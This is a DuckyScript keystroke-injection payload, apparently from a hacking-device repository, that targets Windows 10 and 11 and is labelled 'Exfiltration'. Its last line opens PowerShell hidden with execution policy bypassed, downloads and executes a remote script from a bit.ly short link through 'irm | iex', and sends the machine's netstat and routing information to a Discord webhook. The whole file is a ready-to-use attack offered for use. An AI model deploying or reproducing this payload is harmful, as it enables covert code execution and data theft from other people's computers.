Aleff
35 lines
1.6 KiB
Plaintext
35 lines
1.6 KiB
Plaintext
REM ###################################################################
|
|
REM # |
|
|
REM # Title : Windows-netstat-to-Discord-Exfiltration |
|
|
REM # Author : Aleff |
|
|
REM # Version : 1.0 |
|
|
REM # Category : Exfiltration |
|
|
REM # Target : Windows 10-11 |
|
|
REM # |
|
|
REM ###################################################################
|
|
|
|
REM Title: Windows-netstat-to-Discord-Exfiltration
|
|
REM Author: Aleff
|
|
REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
|
REM Put 1 on the function that you want to active, else 0. Functions available:
|
|
REM - default (simple 'netstat' command)
|
|
REM - routing_table $r
|
|
REM - listening_canonical $lc
|
|
REM - listening_numerical $ln
|
|
REM - all_canonical $ac
|
|
REM - all_numerical $an
|
|
REM - offload ot
|
|
REM - proto $p "<protocol>"
|
|
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
|
|
|
|
REM Target: Windows 10-11 (PowerShell)
|
|
REM Version: 1.0
|
|
REM Category: Net, Exfiltration
|
|
REM Requirements: Internet connection
|
|
REM
|
|
|
|
|
|
DELAY 2000
|
|
GUI r
|
|
DELAY 250
|
|
STRINGLN powershell -w h -ep bypass $discord='<your-webhook-here>';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm bit.ly/WindowsNetstatScript1 | iex |